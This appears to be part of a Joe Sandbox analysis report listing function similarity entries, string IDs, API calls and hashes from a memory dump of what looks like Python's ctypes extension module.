                                                                                                                                                                                                                          • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrFormatLong_Object_OccurredParseProcRestoreSaveSizeTuple_Void
                                                                                                                                                                                                                          • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                                          • API String ID: 3341457601-4011516582
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
                                                                                                                                                                                                                          • String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                                                                                                                                                                                          • API String ID: 2975079148-1488966637
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B72D
                                                                                                                                                                                                                          • PyObject_CallObject.PYTHON38 ref: 00007FF8BFB7B767
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B7D2
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7B7F6
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyErr_Format.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B83C
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyObject_IsInstance.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B84D
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B86E
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B883
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8BF
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8D9
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyTuple_Pack.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B94A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Object_$CallDeallocErr_FormatInstanceObjectPackTuple_memcpy
                                                                                                                                                                                                                          • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                                                                                                                                                                                          • API String ID: 1877528213-3177377183
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PyTuple_New.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78B32
                                                                                                                                                                                                                          • PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78BB4
                                                                                                                                                                                                                          • PyErr_Format.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CCC
                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CDD
                                                                                                                                                                                                                          • PyTuple_GetSlice.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78E38
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Tuple_$DeallocErr_FormatLongLong_MaskSliceUnsigned
                                                                                                                                                                                                                          • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
                                                                                                                                                                                                                          • API String ID: 3242343960-2588965191
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeallocItem$Err_$Dict_ErrorOccurredSequence_With$AttrFormatObject_
                                                                                                                                                                                                                          • String ID: duplicate values for field %R
                                                                                                                                                                                                                          • API String ID: 520049408-1910533534
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$DeallocObject_$AttrErr_InstanceLookupStringUnicode_
                                                                                                                                                                                                                          • String ID: P$wrong type
                                                                                                                                                                                                                          • API String ID: 1377076302-281217272
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Buffer_ReleaseString$Arg_FormatParseSizeTuple_memcpy
                                                                                                                                                                                                                          • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$offset cannot be negative$y*|n:from_buffer_copy
                                                                                                                                                                                                                          • API String ID: 1815618437-871501202
                                                                                                                                                                                                                          • Opcode ID: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                                                                          • Instruction ID: 2f1d948b09bee3edaee4307353a05afe1d3db374466fb688c161e45da43723b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91310665B19B8681EB20DFAEE8901B967A0FBC8FC4B544032DB5E87B65DE3CE505C740
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FromStringUnicode_
                                                                                                                                                                                                                          • String ID: <cparam '%c' (%I64d)>$<cparam '%c' (%d)>$<cparam '%c' (%f)>$<cparam '%c' (%ld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                                                                                                                                                                                          • API String ID: 2818169177-1032293993
                                                                                                                                                                                                                          • Opcode ID: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                                                                          • Instruction ID: dfe6f6c113994ba1d5c743bda7a889ee83ce2945c9cf3b9d079f3e323818a1a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA41AF62A1D54385E7799FBCE8545792F71FF897C8F980232D78E068A9EE2CE905C300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                                                                                                                                                                                          • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                                                                                                                                                                                          • API String ID: 111561578-4068157617
                                                                                                                                                                                                                          • Opcode ID: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                                                                          • Instruction ID: daee6d019701e18aefcbe87488ad599b46d5f6bf77806eea58a4cd0535ff7483
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53312772A09B8681EB809FEAE8440B873A4FB89BE4B584136DB5D47761DF3CE494C300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$ArgsCallErr_FunctionObject_Occurredffi_callffi_prep_cifmemset
                                                                                                                                                                                                                          • String ID: argument %zd:
                                                                                                                                                                                                                          • API String ID: 3446152234-2109984780
                                                                                                                                                                                                                          • Opcode ID: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                                                                          • Instruction ID: f82d38600435c94539692823037c7c1039e85f8cf3a786ac204744820d54e13b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EA1B023B09B8285EA608FA9D8402B96B60FF40BE4F584636DB6E47BD5DF3CE5518300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
                                                                                                                                                                                                                          • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 920172908-178309214
                                                                                                                                                                                                                          • Opcode ID: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                                                                          • Instruction ID: 4b5324d77e8f56e985c4af0e86cc2dda57dbd9ac910277eed4f750e025a6ba68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721F326A1AA4681EA94CFDAE8540782760FFC8BD0F544036EB4E87765DE3CE498C301
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$DeallocString$Formatmemcpy
                                                                                                                                                                                                                          • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                                                                                                                                                                                          • API String ID: 1948958528-1866040848
                                                                                                                                                                                                                          • Opcode ID: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                                                                          • Instruction ID: 0b4ba0c1f71c568ae2da59748167b1e2c025f755f6426a31e1424f6942f9d65f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1213771A08A4281EB909FAEE8801BDB7A5FB85FD8F105132DB1E47A65DF3CE485C300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                          • String ID: wrong type
                                                                                                                                                                                                                          • API String ID: 3617616757-2191655096
                                                                                                                                                                                                                          • Opcode ID: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                                                                          • Instruction ID: 0cad9f02691801400bcd75e6172d3e7b3581136e1c9949ab18bf30729801e771
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5513C61A0AA4381FE549F9DD9501796BA2EF84BC0F588435DB0E4B7A9EF2CF894C740
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallDeallocDict_Err_MallocMem_MemoryObjectObject_Update
                                                                                                                                                                                                                          • String ID: X{}
                                                                                                                                                                                                                          • API String ID: 3334104440-2140212134
                                                                                                                                                                                                                          • Opcode ID: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                                          • Instruction ID: 777695070a465879e8142fd289ac50bc93ef4738ae5d48bc954743cf291dd9e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9316D31A0DB8285EB558FA9E9542B87BA0EF89BD0F588530CB5E43B95DF3CE584C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
                                                                                                                                                                                                                          • String ID: byte string too long$cannot delete attribute
                                                                                                                                                                                                                          • API String ID: 1128862751-688604938
                                                                                                                                                                                                                          • Opcode ID: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                                                                          • Instruction ID: 30309f05f6ebdcb279f0e96bad639b8c0f57db46c84a960412b0ef56de573119
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0011761A1AA4681EF50EFE9E8500B96360FFC4FD5B504232DA5E86AA5DE2DE544C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatNumber_OccurredSsize_tSubtypeTupleType_Unpack
                                                                                                                                                                                                                          • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                                                                                                                                                                                          • API String ID: 3717719007-1446499295
                                                                                                                                                                                                                          • Opcode ID: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                                                                          • Instruction ID: 16d43837195dacf5edf2a0d808a9880089ed45eeb75a51817458e60444b7074c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A213426A09A4681EB00CBA9E8506B877A0FF88BE4F044636CB6E87791DF7DE554C301
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                                                                          • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
                                                                                                                                                                                                                          • API String ID: 3227297879-2360062653
                                                                                                                                                                                                                          • Opcode ID: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                                                                          • Instruction ID: 043a6a045711c4e389593e92973763f62059c7bfa9f88de0d5bf61eebb494014
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94212925B09A46D5EB149F99E44127827A1FFC4FC8F088031DF4E873AADE2CE885C740
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
• Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                                                                          • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                                                                                                                                                                                          • API String ID: 3227297879-1038790478
                                                                                                                                                                                                                          • Opcode ID: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
                                                                                                                                                                                                                          • Instruction ID: 5963908313302226d692856038e902f4be350d0e05f486ff6b0442196b1be6a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
